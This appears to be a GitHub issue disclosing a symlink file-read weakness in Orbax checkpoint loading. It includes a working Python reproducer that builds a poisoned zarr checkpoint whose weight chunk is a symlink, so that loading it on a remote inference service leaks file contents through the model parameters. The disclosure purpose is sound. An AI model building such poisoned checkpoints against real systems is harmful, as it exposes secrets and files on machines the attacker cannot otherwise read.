Is it possible to forbid reading symlinks from the checkpoint folder to avoid reading any files from the file system?
orbax_checkpointer = ocp.Checkpointer(ocp.PyTreeCheckpointHandler())
restored = orbax_checkpointer.restore(ckpt_path, item=target)
It can be an issue if in a certain case, when a user has access to an infrastructure where they do not have full access but just some "inference engine" and they can load pretrained weights, so they can "attack" the system with poisoned weights and try to read files from the model weights.
Here is an orbax-checkpoint-only reproducer with detailed explanation:
from pathlib import Path
import shutil
import json
import numpy as np
import orbax.checkpoint as ocp
def make_poisoned_checkpoint(output_path: Path, file_to_read: Path, n: int):
checkpointer = ocp.Checkpointer(
ocp.PyTreeCheckpointHandler(use_ocdbt=False, use_zarr3=True)
)
checkpointer.save(output_path, {"w": np.zeros(n, np.uint8)})
# make a symlink for the stored weights
p = output_path / "w" / "c" / "0"
assert p.exists()
p.unlink()
p.symlink_to(file_to_read)
# replace zarr file
p = output_path / "w" / "zarr.json"
assert p.exists()
p.unlink()
with p.open("w") as f:
obj = {
"zarr_format": 3,
"chunk_key_encoding": {"name": "default"},
"node_type": "array",
"fill_value": 0,
"shape": [n],
"data_type": "uint8",
"chunk_grid": {
"name": "regular",
"configuration": {"chunk_shape": [n]}
},
"codecs":[{"name":"bytes"}],
}
json.dump(obj, f)
if __name__ == "__main__":
# Context: Let's say we want to read a file from a remote machine where
# we do not have direct FS access but we have an access to an inference engine
# and can load a checkpoint and inspect model's parameters.
# Step 1:
# We prepare on a host machine a poisoned checkpoint with a symlink on the file
# we want to read on remote machine
file_to_read = Path("/tmp/some_data")
with file_to_read.open("w") as f:
f.write("this-is-a-secret")
chkpt_out_folder = Path("/tmp/poisoned_chkpt")
if chkpt_out_folder.exists():
shutil.rmtree(chkpt_out_folder)
# here we make a shortcut to get the exact number of bytes we need to make
# two checkpoint and get the exact value when first tried to load the checkpoint
# on the remote machine
n = 22
make_poisoned_checkpoint(chkpt_out_folder, file_to_read, n=n)
# Step 2:
# Now we are in the remote machine but we have a limited access:
# we can load pretrained weights to a model and inspect model weights
# We'll omit the model itself for simplicity
# Write something else to the file on the remote machine
with file_to_read.open("w") as f:
f.write("this-is-another-secret")
# We "download" the poisoned checkpoint
ckpt_path = chkpt_out_folder
# We load the checkpoint
checkpointer = ocp.Checkpointer(ocp.PyTreeCheckpointHandler())
restored = checkpointer.restore(ckpt_path, item=None)
# Now we can read the data from the file:
print(bytes(np.asarray(restored["w"]).astype(np.uint8).tobytes()).splitlines()[0])
# b'this-is-another-secret'
Context: google/flax#5487 (comment) and credits to the author of the issue.
Is it possible to forbid reading symlinks from the checkpoint folder to avoid reading any files from the file system?
It can be an issue if in a certain case, when a user has access to an infrastructure where they do not have full access but just some "inference engine" and they can load pretrained weights, so they can "attack" the system with poisoned weights and try to read files from the model weights.
Here is an orbax-checkpoint-only reproducer with detailed explanation:
Context: google/flax#5487 (comment) and credits to the author of the issue.